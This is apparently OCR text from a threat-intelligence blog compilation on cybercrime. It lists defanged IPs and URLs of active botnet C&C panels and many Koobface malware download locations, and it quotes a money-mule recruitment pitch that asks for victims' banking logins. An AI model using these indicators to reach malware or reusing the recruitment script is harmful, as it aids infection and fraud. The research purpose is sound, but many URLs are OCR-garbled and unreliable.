purpose of dropping malware on the affected host including the rise of the ransomware threat 
which is basically an old fashioned academic concept known as cryptoviral extortion. 


With more novice cybercriminals joining the underground ecosystem market segment largely 
driven by a set of newly emerged affiliate based revenue sharing fraudulent and malicious 
networks offering financial incentive for participation in a fraudulent scheme it shouldn’t be 
surprising that more people are actually joining the cybercrime ecosystem potentially causing 
widespread damage and havoc online. 


With cybercrime friendly forums continuing to proliferate it should be clearly evident that more 
people will eventually join these marketplaces potentially looking for new market segment 
propositions to take advantage of for the purpose of joining the cybercrime ecosystem and that 
more vendors will eventually continue to occupy and launch new underground forum market 
propositions for the purpose of promoting and looking for new clients for the services. 


In a World dominated by a geopolitically relevant Internet cybercrime ecosystem it shouldn’t 
be surprising that more international cybercrime gangs will eventually continue to launch new 
fraudulent and malicious spam and phishing campaigns that also includes malicious software 
Campaigns for the purpose of earning fraudulent revenue. 


With more affiliate based underground market segment based networks aiming to attract new 
uses where they would forward the risk for the actual infection process and fraudulent transac- 
tion to the actual user in exchange for offering access to sophisticated bulletproof infrastructure 
including advanced and sophisticated malware and ransomware releases it shouldn’t be sur- 
prising that more people are actually joining these affiliate networks for the purpose of earning 
fraudulent revenue in the process of causing havoc and widespread disruption online. 
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In this brief Basics of OSINT in the context of fighting cybercrime article we provided a general 
overview of the process of using OSINT for cybercrime fighting purposes and we hope that you 
enjoyed the article and will be eager to go through the second part of the article series which 
will be published at our Web site in the coming weeks. 


Sample screenshots include: 


[2] 


[3] 
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19.4.13 Today’s Compilation of Botnet’s C&C Panels (2023-04-28 13:31) 


[1] 


Unlock 


| decided to share with everyone a currently active set of botnet C &C panels which | 
obtained using OSINT and public sources which are currently active in the time of posting 
this with the idea to raise more awareness on their existence and potentially prompt you to 
go deeper in terms of research and tracking down the cybercriminals behind these campaigns. 


Known responding IPs: 
190[.]123[.]44[.]145 
37[.]139[.]129[.]69 
79[.]137[.]203[.]19 
179[.]43[.]142[.]172 
31[.]41[.]244[.]146 
Sample C &C Panels: 
hxxp://sertvs[.]com/8vcWxwwx3/index[.]php 
hxxp://specialblue[.]in/dF30Hn4m/index[.]php 
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hxxp://79[.]137[.]203[.]19/6nd8ssa3/Login[.]php 
hxxp://179[.]43[.]142[.]172:443/admin/console/ 
hxxp://31[.]41[.]244[.]146/u83mfdS2/Login[.]php 


1. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEgFi0yztd5vhf AvhLaj1RF JoHdndVCWS7TGWifh5HOO6I0 
BSDQW_KnwnBQyqknLO jKoDcWu9W43MAFF5gcdYwdY48D6LHuxXa4RHA 


19.4.14 A Compilation of Koobface Botnet Themed Malicious Executable Download 
Locations 2009 - 2011 (2023-04-28 13:31) 


[1] 


Video posted by ... Sponge Bob ... 


u@ Sr o-) 


Video Responses: 10 Text Comments: 70 


Would you like to comment? 


While digging into my old threat intelligence research archive | found the following which | 
decided to share with everyone. 


Happy "takes you back doesn’t it" time and OSINT and threat intelligence for historical cross- 
checking and connecting the dots time. 


Sample URLs include: 
hxxp://selectionmusic[.]co[.]za/[.]sys[.]php?getexe=poster [.]10[.]exe 
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hxxp://selectionmusic[.]co[.]za/[.]sys[.]php?getexe=fri endfeedreg[.]1[.Jexe 
hxxp://selectionmusic[.]co[.]za/[.]sys[.]php?getexe=aolsbn .]2[.]exe 
hxxp://selectionmusic[.]co[.]za/[.]sys[.]php?getexe=twreg[. ]12[.Jexe 
hxxp://selectionmusic[.]co[.]za/[.]sys[.]php?getexe=tumreg [.]1[.]exe 
hxxp://roomservicedesign[.]com[. ]au/[.]9mov05w/?getexe=drk[.] exe 
hxxp://roomservicedesign[.]com[. ]au/[.]9mov05w/?getexe=ffe32[. Jexe 
hxxp://roomservicedesign[.]com[. ]au/[.]9mov05w/?getexe=y ahblog[.]exe 
hxxp://mdcoc[. ]net/jxjv0z2s/setup798342[.]exe 
hxxp://www[.]blowmeupbig[.]com/[.]iunb8/?getexe=zal[.]exe 
hxxp://www[.]blowmeupbig[.]com/[.]iunb8/?getexe=hny32[.]Jexe 
hxxp://www[.]chateaudecoisse[.]com/[.]tfdmezb/?getexe=m24[.]i n[.Jexe 
hxxp://www[.]chateaudecoisse[.]com/[.]tfdmezb/?getexe=dg[.] exe 
hxxp://anlaegkp[.]dk/trygxqlz/setup314555[.]exe 

hxxp://lyulf[. ]co[.]uk/2pmflqq/setup742472[.Jexe 
hxxp://careyadkinsdesign[.]com/[.]uzb62/?getexe=ff2ie[.]exe 
hxxp://careyadkinsdesign[.]com/[.]uzb62/?getexe=p[.]Jexe 
hxxp://careyadkinsdesign[.]com/[.]uzb62/?getexe=m24[. ]in[.]ex e 
hxxp://careyadkinsdesign[.]com/[.]uzb62/?getexe=dg[.]exe 
hxxp://solarinstitut[.]com/yf734/index[.]php?e=635893 
hxxp://helpingouryouthachieve[.]com/sim/index[.]php?e=590202 
hxxp://www[.]darelorenzo[.]it/[.]sys/?action=fogen &v=104 &crc=669 
hxxp://1zabslwvn538n4i5tcjl[.]com/temp/exe/codec[.]exe 
hxxp://smx[.]nu/y580/setup[.]Jexe 

hxxp://mantleofmercy[.]org/07/ 

hxxp://watvindteindhoven[.]nl/614/?go 
hxxp://stagnescathedrall.]org/actualperformans/?72691/ 
hxxp://partenaires-particuliers[.]fr/[.]abodpg/?getexe=tg[. ]16[.]exe 
hxxp://viale[.]be/[.]jxel/?getexe=p[.]exe 
hxxp://viale[.]be/[.]jxel/?getexe=ws|[.]exe 
hxxp://cedelevator[.]com/[.]sys/?getexe=tg[.]16[.]exe 
hxxp://wwwl[.]person[. ]doae[.]go[.]th/[.]sys/?getexe=tg[ .]16[.]exe 
hxxp://ntas[.]com/[.]sys/?getexe=tg[.]16[.Jexe 


hxxp://waypoint-center[.]org/[.]sys/?action=ppgen &a=-2001606274 &v=106 &pid=1000 


hxxp://waypoint-center[.]org/[.]sys/?action=fobgen &v=106 &crc=669 


hxxp://deltasatuk[.]com/[.]sys/?getexe=cmd[.]exe 
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hxxp://deltasatuk[.]com/[.]sys/?getexe=hostsgb3[.]exe 
hxxp://deltasatuk[.]com/[.]sys/?getexe=ws|[.]exe 
hxxp://formacio[.]eio[.]es/[.]sys/?getexe=hostsgb3[.]exe 
hxxp://formacio[.]eio[.]es/[.]sys/?getexe=ws[.]exe 
hxxp://grdcb[.]com/[.]sys/?getexe=cmd[.]exe 
hxxp://grdcb[.]com/[.]sys/?getexe=hostsgb3[.]exe 
hxxp://grdcb[.]com/[.]sys/?getexe=ws[.]exe 
hxxp://inartdesigns[.]com/[.]sys/?getexe=hostsgb3[.]exe 
hxxp://inartdesigns[.]com/[.]sys/?getexe=ws[.]exe 
hxxp://jcshop[. ]netfirms[.]com/[.]sys/?getexe=ws[.]exe 
hxxp://journalsexyplus[.]com/[.]sys/?getexe=hostsgb3[.]exe 
hxxp://journalsexyplus[.]com/[.]sys/?getexe=ws[.]exe 
hxxp://littlepalmbeach[.]com/[.]sys/?getexe=cmd[.]Jexe 
hxxp://littlepalmbeach[.]com/[.]sys/?getexe=hostsgb3[.]exe 
hxxp://littlepalmbeach[.]com/[.]sys/?getexe=ws|[.]exe 
hxxp://lotuscovecampground[.]com/[.]sys/?getexe=cmd[.]exe 
hxxp://lotuscovecampground[.]com/[.]sys/?getexe=hostsgb3[.]e xe 
hxxp://lotuscovecampground[.]com/[.]sys/?getexe=ws[.]exe 
hxxp://micaelmarkstrom[.]se/[.]sys/?getexe=cmd[.]exe 
hxxp://micaelmarkstrom[.]se/[.]sys/?getexe=hostsgb3[.] exe 
hxxp://micaelmarkstrom[.]se/[.]sys/?getexe=ws|[.]lexe 
hxxp://sphusa[.]com/[.]sys/?getexe=cmd[.]lexe 
hxxp://sphusal[.]com/[.]sys/?getexe=hostsgb3[.]exe 
hxxp://sphusa[.]com/[.]sys/?getexe=v2bloggerjs[.]exe 
hxxp://sphusa[.]com/[.]sys/?getexe=v2newblogger[.]exe 
hxxp://sphusa[.]com/[.]sys/?getexe=ws[.]Jexe 
hxxp://tjsokolosek[.]wz[.]cz/[.]sys/? getexe=loader[.]exe 
hxxp://www[.]shogunlevallois[.]com/[.]sys/?getexe=cmd[.]exe 
hxxp://www[.]shogunlevallois[.]Jcom/[.]sys/?getexe=hostsgb3[. Jexe 
hxxp://www[.]shogunlevallois[.]com/[.]sys/?getexe=ws|[.]exe 
hxxp://www[. ]trattoriabilly[.]com/[.]sys/?getexe=hostsgb3[.] exe 
hxxp://www[. ]trattoriabilly[.]com/[.]sys/?getexe=ws|[.]lexe 
hxxp://goldmaniac[.]com/[.]sys/?getexe=hostsgb3[.]exe 
hxxp://www[. ]jwdtrees[.]com/[.]sys/?getexe=hostsgb3[.]exe 
hxxp://www[.]jwdtrees[.]com/[.]sys/?getexe=loader[.]exe 
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hxxp://wwwl.]lionkitchen[.]Jcom[.]sg/[.]sys/?getexe=loader[ .Jexe 
hxxp://wwwI[.]shogunlevallois[.]com/[.]sys/?getexe=hosts2[.]Jex e 
hxxp://wwwI[.]wttcmi[.]com/[.]sys/?getexe=hosts2[.]exe 
hxxp://car-transport[.]com[.]au/[.]sys/?getexe=loader|[.]exe 
hxxp://cooperville[.]be/[.]sys/?getexe=go[.]exe 
hxxp://cooperville[.]be/[. ]sys/?getexe=loader|[.]exe 
hxxp://cooperville[.]be/[.]sys/?getexe=pp[.]14[.]exe 
hxxp://cooperville[.]be/[.]sys/?getexe=v2bloggerjs[.]exe 
hxxp://cooperville[.]be/[.]sys/?getexe=v2captcha21[.]exe 
hxxp://cooperville[.]be/[.]sys/?getexe=v2newblogger[.]exe 
hxxp://cooperville[.]be/[. ]sys/?getexe=v2webserver|[.]lexe 
hxxp://deltasatuk[.]com/[.]sys/?getexe=go[.]exe 
hxxp://deltasatuk[.]com/[.]sys/?getexe=loader[.]exe 
hxxp://deltasatuk[.]com/[.]sys/?getexe=pp[.]14[.]exe 
hxxp://deltasatuk[.]com/[.]sys/?getexe=v2bloggerjs[.Jexe 
hxxp://deltasatuk[.]com/[.]sys/?getexe=v2captcha21[.]exe 
hxxp://deltasatuk[.]com/[.]sys/?getexe=v2newblogger[.]exe 
hxxp://deltasatuk[.]com/[.]sys/?getexe=v2webserver[.]lexe 
hxxp://edensensuel[. ]fr/[. lsys/?getexe=go[.]exe 
hxxp://edensensuel[. ]fr/[. sys/?getexe=loader[.]exe 
hxxp://edensensuel[. ]fr/[. ]sys/?getexe=pp[.]14[.Jexe 
hxxp://edensensuel[. ]fr/[. sys/?getexe=v2bloggerjs[.]exe 
hxxp://edensensuel[. ]fr/[. lsys/?getexe=v2captcha21[.]lexe 
hxxp://edensensuel[. ]fr/[. ]sys/?getexe=v2googlecheck[.]exe 
hxxp://edensensuel[. ]fr/[. lsys/?getexe=v2newblogger[.]exe 
hxxp://edensensuel[. ]fr/[. lsys/?getexe=v2webserver[.]e xe 
hxxp://ertrafikskola[.]se/[.]sys/?getexe=go[.]exe 
hxxp://ertrafikskola[.]se/[.]sys/?getexe=hosts2[.]exe 
hxxp://ertrafikskola[.]se/[.]sys/?getexe=loader[.]exe 
hxxp://ertrafikskola[.]se/[.]sys/?getexe=p[.]Jexe 
hxxp://ertrafikskola[.]se/[.]sys/?getexe=pp[.]14[.Jexe 
hxxp://ertrafikskola[.]se/[.]sys/?getexe=v2webserver[.]exe 
hxxp://formacio[.]eio[.]es/[.]sys/?getexe=go[.]exe 
hxxp://formacio[.]eio[.]es/[.]sys/?getexe=hosts2[.]exe 


hxxp://formacio[.]eio[.]es/[.]sys/?getexe=pp[.]14[.Jexe 
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hxxp://formacio[.]eio[.]es/[.]sys/?getexe=v2bloggerjs[.Je xe 
hxxp://formacio[.]eio[.]es/[.]sys/?getexe=v2captcha21[.]exe 
hxxp://formacio[.]eio[.]es/[.]sys/?getexe=v2newblogger|[.]exe 
hxxp://formacio[.]eio[.]es/[.]sys/?getexe=v2webserver[.]exe 
hxxp://goldenliontech[.]com/[.]sys/?getexe=loader[.]exe 
hxxp://grdcb[.]com/[.]sys/?getexe=go[.]exe 
hxxp://grdcb[.]com/[.]sys/?getexe=hosts2[.]exe 
hxxp://grdcb[.]com/[.]sys/?getexe=p[.]exe 
hxxp://grdcb[.]com/[.]sys/?getexe=v2bloggerjs[.]exe 
hxxp://grdcb[.]com/[.]sys/?getexe=v2captcha21[.]exe 
hxxp://grdcb[.]com/[.]sys/?getexe=v2webserver[.]exe 
hxxp://jcshop[. ]netfirms[.]com/[.]sys/?getexe=go[.]exe 
hxxp://jcshop[.]netfirms[.]com/[.]sys/?getexe=loader[.]exe 
hxxp://jcshop[. ]netfirms[.]com/[.]sys/?getexe=pp[.]14[.]Je xe 
hxxp://jcshop[.]netfirms[.]com/[.]sys/?getexe=v2bloggerjs[.] exe 
hxxp://jcshop[. ]netfirms[.]com/[.]sys/?getexe=v2captcha21[.]e xe 
hxxp://jcshop[.]netfirms[.]com/[.]sys/?getexe=v2newblogger[. ]exe 
hxxp://jcshop[. ]netfirms[.]com/[.]sys/?getexe=v2webserver[.]e xe 
hxxp://journalsexyplus[.]com/[.]sys/?getexe=v2bloggerjs[.]exe 
hxxp://journalsexyplus[.]com/[.]sys/?getexe=v2captcha21[.]exe 
hxxp://journalsexyplus[.]com/[.]sys/?getexe=v2newblogger[.]exe 
hxxp://journalsexyplus[.]com/[.]sys/?getexe=v2webserver[.]lexe 
hxxp://juanfurlan[.]com[.]ar/[.]sys/?getexe=v2captcha21[.]e xe 
hxxp://littlepalmbeach[.]com/[.]sys/?getexe=go[.]exe 
hxxp://littlepalmbeach[.]com/[.]sys/?getexe=hosts2[.]e xe 
hxxp://littlepalmbeach[.]com/[.]sys/?getexe=loader[.]exe 
hxxp://littlepalmbeach[.]com/[.]sys/?getexe=pp[.]14[.]exe 
hxxp://littlepalmbeach[.]com/[.]sys/?getexe=v2bloggerjs[.]exe 
hxxp://littlepalmbeach[.]com/[.]sys/?getexe=v2captcha21[.]exe 
hxxp://littlepalmbeach[.]com/[.]sys/?getexe=v2newblogger[.]exe 
hxxp://littlepalmbeach[.]com/[.]sys/?getexe=v2webserver[.]exe 
hxxp://mahjongmuseum[.]com/[.]sys/?getexe=p[.]Jexe 
hxxp://mdcoc[.]net/[.]sys/?getexe=go[.]exe 
hxxp://mdcoc[.]net/[.]sys/?getexe=hosts2[.]exe 
hxxp://mdcoc[.]net/[.]sys/?getexe=p[.]exe 
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hxxp://mdcoc[.]net/[.]sys/?getexe=pp[.]14[.]exe 
hxxp://mdcoc[. ]net/[.]sys/?getexe=v2bloggerjs[.]exe 
hxxp://mdcoc[. ]net/[.]sys/?getexe=v2captcha21[.]exe 
hxxp://mdcoc[.]net/[.]sys/?getexe=v2googlecheck[.]exe 
hxxp://mdcoc[. ]net/[.]sys/?getexe=v2newblogger[.]exe 
hxxp://mdcoc[. ]net/[.]sys/?getexe=v2webserver[.]exe 
hxxp://micaelmarkstrom[.]se/[.]sys/?getexe=go[.]exe 
hxxp://micaelmarkstrom[.]se/[.]sys/?getexe=loader[.]exe 
hxxp://micaelmarkstrom[.]se/[.]sys/?getexe=pp[.]14[.]exe 
hxxp://micaelmarkstrom[.]se/[.]sys/?getexe=v2bloggerjs[.Jexe 
hxxp://micaelmarkstrom[.]se/[.]sys/?getexe=v2captcha21[.]exe 
hxxp://micaelmarkstrom[.]se/[.]sys/?getexe=v2newblogger[.]exe 
hxxp://micaelmarkstrom[.]se/[.]sys/?getexe=v2webserver[.]exe 
hxxp://prostruction[.]net/[. ]sys/?getexe=gol[.]Jexe 
hxxp://prostruction[.]net/[.]sys/?getexe=hosts2[.]exe 
hxxp://prostruction[.]net/[. ]sys/?getexe=p[.]exe 
hxxp://prostruction[.]net/[. ]sys/?getexe=v2webserver[.]lexe 
hxxp://shirleymancino[.]com/[.]sys/?getexe=go[.]exe 
hxxp://shirleymancino[.]com/[.]sys/?getexe=hosts2[.]exe 
hxxp://shirleymancino[.]com/[.]sys/?getexe=loader[.]exe 
hxxp://shirleymancino[.]com/[.]sys/?getexe=pp[.]14[.]exe 
hxxp://shirleymancino[.]com/[.]sys/?getexe=v2bloggerjs[.]exe 
hxxp://shirleymancino[.]com/[.]sys/?getexe=v2captcha21[.]exe 
hxxp://shirleymancino[.]com/[.]sys/?getexe=v2googlecheck[.]exe 
hxxp://shirleymancino[.]com/[.]sys/?getexe=v2newblogger[.]exe 
hxxp://shirleymancino[.]com/[.]sys/?getexe=v2webserver[.]exe 
hxxp://sphusa[.]com/[.]sys/?getexe=go[.]Jexe 
hxxp://sphusa[.]com/[.]sys/?getexe=loader[.]exe 
hxxp://sphusa[.]com/[.]sys/?getexe=pp[.]14[.]Jexe 
hxxp://sphusa[.]com/[.]sys/?getexe=v2captcha21[.]exe 
hxxp://testing[.]onlinesigns[.]co[.]za/[.]sys/?get exe=loader[.]exe 
hxxp://testing[.Jonlinesigns[.]co[.]za/[.]sys/?getexe=pp[. ]14[.]exe 
hxxp://testing[.]Jonlinesigns[.]co[.]za/[.]sys/?getexe=v2blogg erjs[.Jexe 
hxxp://testing[.Jonlinesigns[.]co[.]za/[.]sys/?gete xe=v2captcha21[.]Jexe 
hxxp://testing[.Jonlinesigns[.]co[.]za/[.]sys/?getexe=v2googl echeck[.]exe 
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hxxp://testing[.Jonlinesigns[.]co[.]za/[.]sys/?getexe=v2newbl ogger|.]exe 
hxxp://testing[.]onlinesigns[.]co[.]za/[.]sys/?getexe=v2webse rver[.]exe 

hxxp://www[. Jaustralianslongevity[.]net/[.]sys/?getexe=loader[ .Jexe 
hxxp://www[.]corteostoricoterrasanctibenedicti[.]org/[.]sys/?gete xe=go[.]exe 
hxxp://www[. ]corteostoricoterrasanctibenedicti[.]org/[.]sys/?gete xe=loader[.]exe 
hxxp://www[.]corteostoricoterrasanctibenedicti[.]org/[.]sys/?gete xe=pp[.]14[.Jexe 
hxxp://www[.]corteostoricoterrasanctibenedicti[.]org/[.]sys/?gete xe=v2bloggerjs[.]exe 
hxxp://www[.]corteostoricoterrasanctibenedicti[.]lorg/[.]sys/?gete xe=v2captcha21[.]exe 
hxxp://www[. ]corteostoricoterrasanctibenedicti[.]org/[.]sys/?gete xe=v2newblogger|[.]Jexe 
hxxp://www[.]corteostoricoterrasanctibenedicti[.]org/[.]sys/?gete xe=v2webserver|[.Jexe 
hxxp://www[. ]dinovincenzopatroni[.]com/[.]sys/?getexe=go[.]ex e 
hxxp://www[.]dinovincenzopatroni[.]com/[.]sys/?getexe=hosts2[ .Jexe 
hxxp://www[.]dinovincenzopatroni[.]com/[.]sys/?getexe=loa der[.]exe 

hxxp://www[. ]dinovincenzopatroni[.]com/[.]sys/?getexe=pp[.]14 [.]Jexe 

hxxp://www[. ]dinovincenzopatroni[.]com/[.]sys/?getexe=v2blogger js[.]exe 
hxxp://www[.]dinovincenzopatroni[.]com/[.]sys/?getexe=v2ca ptcha21[.]Jexe 
hxxp://www[. ]dinovincenzopatroni[.]com/[.]sys/?getexe=v2googleche ck[.]exe 
hxxp://www[. ]dinovincenzopatroni[.]com/[.]sys/?getexe=v2newblogge r[.]exe 
hxxp://www[. ]dinovincenzopatroni[.]com/[.]sys/?getexe=v2webserv er[.]exe 
hxxp://wwwl.]fininvel[.]it/[.]sys/?getexe=gol[.]exe 

hxxp://www[.]fininve[.]it/[. ]sys/?getexe=loader[.] exe 

hxxp://www[. ]fininve[.]it/[.]sys/?getexe=pp[.]14[.]exe 

hxxp://www[. ]fininve[.]it/[.]sys/?getexe=v2bloggerjs[.]exe 
hxxp://www[.]fininve[.]it/[.]sys/?getexe=v2captcha21[.]exe 
hxxp://www[.]fininve[. ]Jit/[. ]sys/?getexe=v2newblogger[.]Jexe 

hxxp://www[. ]fininve[.]it/[.]sys/?getexe=v2webserver[.] exe 
hxxp://www[.]firststategymnastics[.]com/[.]sys/?getexe=go[.]Je xe 
hxxp://www[.]firststategymnastics[.]com/[.]sys/?getexe=lo ader[.Jexe 
hxxp://wwwl[.]firststategymnastics[.]com/[.]sys/?getexe=pp[.]1 4[.]exe 
hxxp://www[.]firststategymnastics[.]com/[.]sys/?getexe=v2blogge rjs[.]exe 
hxxp://wwwl[.]firststategymnastics[.]com/[.]sys/?getexe= v2captcha21[.]exe 
hxxp://www[.]firststategymnastics[.]com/[.]sys/?getexe=v2googlech eck[.]exe 
hxxp://www[.]firststategymnastics[.]com/[.]sys/?getexe=v2newblogg er[.]exe 
hxxp://www[.]firststategymnastics[.]com/[.]sys/?getexe=v2webser ver[.]exe 
hxxp://www[.]gecahe[.]com/[.]sys/?getexe=v2bloggerjs[.]exe 
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- We don’t work with recently opened accounts. For safery reasons your bank account 
must be 90+ days 


- Average number of operations per week required 
- Unfortunately we don’t work with prepaid bank accounts 


- Maximum amount you can withdraw in branch daily 


The recruitment organization is clearly aware of basic quality assurance concepts, due to 
its surprising tactic used for monitoring the transaction process for each and every money 
mule working with them. How do they achieve this? By offering a $100 financial incentive 
as a bonus for each and every money mule that provides the bogus company with access to 
their online banking account so that the organization can monitor the transaction process 
remotely. It doesn’t take a rocket scientist to conclude that even with a two-factor authen- 
tication requirement there are ways in which the organization can hijack the entire financial 
identity of the money mule without his/her knowledge. 
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hxxp://wwwl[.]gecahe[.]com/[.]sys/?getexe=v2captcha21[.]exe 
hxxp://wwwl[. ]lavalledellupo[. Jit/[. ]sys/?getexe=go[.]exe 

hxxp://wwwl[. ]lavalledellupo[. ]it/[. ]sys/?getexe=pp[.]14[. ]exe 
hxxp://wwwl[.]lavalledellupo[. Jit/[. Jsys/?getexe=v2bloggerjs[.] exe 
hxxp://wwwI[.]lavalledellupo[.]it/[. ]sys/?getexe=v2captcha21[.] exe 
hxxp://wwwJ[. ]lavalledellupo[. Jit/[. Jsys/?getexe=v2newblog ger[.]exe 
hxxp://www[.]lavalledellupo[.]it/[.]sys/?getexe=v2webserver[.] exe 
hxxp://wwwI[.]person[.]doae[.]go[.]th/[.]sys/?gete xe=pp[.]14[.]exe 
hxxp://wwwI[.]powertreecorp[.]com/[.]sys/?getexe=loader[.]exe 
hxxp://wwwI[.]proelec-dpt[.]fr/[.]sys/?getexe=go[.]exe 
hxxp://wwwl[.]proelec-dptl.]fr/[.]sys/?getexe=loader|.]exe 
hxxp://wwwl.]proelec-dpt[.]fr/[. ]sys/?getexe=pp[.]14[.Jex e 
hxxp://wwwI[.]proelec-dpt[.]fr/[.]sys/?getexe=v2captcha21[.]ex e 
hxxp://wwwI[.]proelec-dpt[.]fr/[. ]sys/?getexe=v2webserver[.]lex e 
hxxp://wwwI.]shogunlevallois[.]com/[.]sys/?getexe=go[.]exe 
hxxp://wwwl[.]shogunlevallois[.]com/[.]sys/?getexe=loader[.]ex e 
hxxp://wwwl[.]shogunlevallois[.]com/[.]sys/?getexe=pp[.]14[ .Jexe 
hxxp://wwwI[.]shogunlevallois[.]com/[.]sys/?getexe=v2bloggerjs[ .Jexe 
hxxp://www[.]shogunlevallois[.]com/[.]sys/?getexe=v2captcha21[. Jexe 
hxxp://www[.]shogunlevallois[.]com/[.]sys/?getexe=v2googlecheck [.]exe 
hxxp://wwwl[.]shogunlevallois[.]com/[.]sys/?getexe=v2newblogger| .Jexe 
hxxp://wwwI[.]shogunlevallois[.]com/[.]sys/?getexe=v2webserver|[. Jexe 
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I'm feeling uncomfortable giving you my online banking details. Why do you need it? I'm worrying about unauthorized access to my 
bank account. 


We require online banking access to monitor deposits coming from our clients. It saves you much time and increase your rating in our 
system 

- There is no need te check your bank account every hour during transactions, your personal supervisor will do it instead of you! You'll be informed 
the same minute funds arrive 

- No need to send us your bank account statement every week (maybe 2-3 times a week 

- We trust you much more, you'll receive money bonuses and more transactions 

It is absolutely safe and legal. We guarantee that al! persona! details will stay safe. Please read our Privac 

IMPOSSIBLE TO MAKE ANY TRANSFERS USING ONLINE ACCESS. If you have no online access to your bank a 

your bank and activate this service. It will take less than 10 minutes 


Online Banking Details 


URL: http:// 
Login: 
Password: 
Next Step Skip This Step Back 


* At this moment we require online access to your bank account optionally but strongly recommend to apply with online banking 
details. NOTE: 


@ agents with online access will have higher priority on getting new tasks (amounts are also larger) 
@ agents with online access receive $100 BONUS to base salary every month 


Again, they answer to a common question even the most gullible end user would have - I’m 
feeling uncomfortable giving you my online banking details. Why do you need it? I’m worrying 
about unauthorized access to my bank account. A question to which they answer by citing 
increasing bonus rating within their system, and that your supervisor will be checking your 
account, thereby improving your trust relationship with the organization: 


"We require online banking access to monitor deposits coming from our clients. It saves 
you much time and increase your rating in our system: 


- There is no need to check your bank account every hour during transactions, your per- 
sonal supervisor will do it instead of you! You'll be informed the same minute funds arrive. 


- No need to send us your bank account statement every week (maybe 2-3 times a week). 


- We trust you much more, you’ll receive money bonuses and more transactions! 


It is absolutely safe and legal. We guarantee that all personal details will stay safe. Please 
read our Privacy Policy. NOTE: IT’S IMPOSSIBLE TO MAKE ANY TRANSFERS USING ONLINE 
ACCESS. If you have no online access to your bank account, you should contact your bank and 
activate this service. It will take less than 10 minutes." 
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Dancho Da 
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Ultimate ve i 
Compilation - 2022 


SetINg them straight since the early days of 


Reseal 


https://iddanchev. blogspot.com 


Guess who’s been busy setting them straight in cyberspace? Well that would be unfortunately 
throughout 2008-2013 when | was most active online making the headlines at unknown places 
online making my day and inspiring me to track down the Koobface botnet on a daily basis. 


Keywords: Dark Web, Dark Web Onion, Hacking, Hacker, Hackers, Dancho Danchev, Intelli- 
gence, Intelligence Studies, Intelligence Community, NSA, GCHQ, Cyber Intelligence, Malicious 
Software, Malware, Cyber Surveillance, Eavesdropping, Wiretapping, Top Secret, Classified, Top 
Secret Program, Classified Program, Cybercrime, Data Mining, Big Data, Cybercrime Research, 
Threat Intelligence, Security Industry, Information Security, Information Security Industry, Com- 
puter Security, Computer Hacking, Network Security, Network Hacking, OSINT, Russia, Iran, 
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Russian Hackers, Iranian Hackers, Russian Cybercriminal, Cybercrime Forum, Cybercrime Fo- 
rum Community, Astalavista, Astalavista.box.sk, Box.sk, Box.sk Network, Cracks, Serials, Key- 
gens, Key Generators, Hacker Search Engine, Cracks Search Engine, Serials Search Engine, 
Threat Intelligence, Cybercrime Research, Malware, Malicious Software, Botnet, Botnets, Re- 
verse Engineering 
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It used to be quite a privilege when | originally attempted to publish an article which | 
proposed to one of my homeland’s primary technology magazine HiComm and when | got 
actually invited to publish a series of articles on a monthly basis. Among the first things 
which | did back then was to translate my extremely popular document “The Complete 
Windows Trojans Paper” to Bulgarian which was quite a success and the article got published 
and accepted which was originally published in the Christmas edition of the magazine. The 
original story behind my infamous “The Complete Windows Trojans Paper” was a major shift 
between my understanding and experience within the hacking Scene and the modern 
security industry where | really wanted and did my best to have a career which leads me to 
today’s leading expert in the field of cybercrime research and threat intelligence including 
security blogging and OSINT research and analysis on the bad guys including various 
international and well known cyber threat actors. 


| originally wrote and released my “The Complete Windows Trojans Paper” on my own as part 
of a major marketing effort to promote my knowledge and expertise in the scene where the 
ultimate goal was to produce a high-quality and never released publication on the topic and 
basically make it easier for everyone to understand the ongoing trend that have to do with 
trojan horses back then where | later on originally published my publication on what used to 
be among my first independent contractor position at my first employer at the time which 
was Netherlands-based Frame4 Security Systems where | also did a marketing editorial on 
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the company’s web site and has been supporting and working with the company ever since. 
The interesting part back then was that I also got a personal recommendation from the 
company owner for my university application which at the time was a Netherlands-based 
university where | had the ambition to relocate with my girlfriend and partner in life at the 
time which we eventually did with the idea to visit and actually go to study in that country. 


While | was in Bulgaria during my teenage hacker years | was busy freelancing as an 
information security consultant while working with international security portals where | was 
busy offering advice and practical information security advice and practical solution 
recommendations including my work with ClO.bg where | once contributed with an article on 
Cyberterrorism and Cyber Jihad including a series of publications for HiComm.bg where | was 
running a popular information security rubric and participated with several articles in several 
of the magazine’s issues. 


At a later stage | somehow decided to go corporate an in a way find a way to enter the 
commercial information security industry with my knowledge potentially beginning to 
contribute with knowledge and information using my personal contacts at various information 
security portals on my way to land a possible job preferably as a writer security blogger or a 
journalist which | apparently succeeded in doing as I’ve been actively contributing with my 
own research and knowledge on a variety of h/c/p/a (Hacking/Cracking/Phreaking/Anarchy) 
portals at the time. At some point in time Dancho decide to approach the primary operator of 
one of his favorite security Web sites at the time — https://net-security.org for the purpose of 
contributing with an article for their newly launched forbidden.net-security.org project. 


My idea was to contribute with a security article for their recently launched Newsletter and 
the article in question was a good old-fashioned “How to use trojan horses” manual. The 
article eventually got accepted and Dancho felt proud of himself for making a contribution to 
the project and having his article published so that eventually more people will read it and 
send him an email with questions about trojan horses and the actual article. The primary 
Webmaster of net-security.org at the time was Berislav Kucan and the project still remains 
one of my favorite and most popular visited security Web site on a daily basis. At a later 
stage | decided to establish a working relationship with Frame4 Security Systems which is a 
Dutch-based company for the purpose of writing an improved version of the original “How to 
use trojan horses” paper which later on became the “The Complete Windows Trojans Paper” 
which quickly became one of the Scene’s most popular and highly read paper on modern 
trojan horses and how to use them and how to protect against them. 


With the summer coming to an end | got an offer to begin to work at the local office of his ISP 
(Internet Service Provider) which at the time was Digital Systems for the position of office 
assistant where he was responsible for introducing new clients to the ISP’s service offering 
and for processing invoices. Among the key benefits for working at the local ISP office was 
the actual bandwidth that he got access to allowing him to access the Internet without any 
sort of limitations which he used to visit some of his favorite Top50 and Top100 security and 
hacking Web sites where he eventually downloaded some of the most recently released 
hacking and security tools including trojan horses which he copied on a floppy disk and 
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eventually brought back home during the lunch break for the purpose of exchanging the 
information with his second employer at the time which was an anti-trojans vendor using a 
publicly accessible FTP server for the purpose of helping his employer improve the detection 
rate for these type of programs and trojan horses. | would then receive a payment for having 
collected and actually shared these programs and trojan horses which he would use to pay 
the bills at the time and actually pay for using his ISP’s service. 


At some point in time he eventually got approached by a guy known as HeLLfiReZ who was 
interested in working with him and actually sharing his collection of trojan horses which he 
would then also share with his employer which at the time was LockDownCorp and earn 
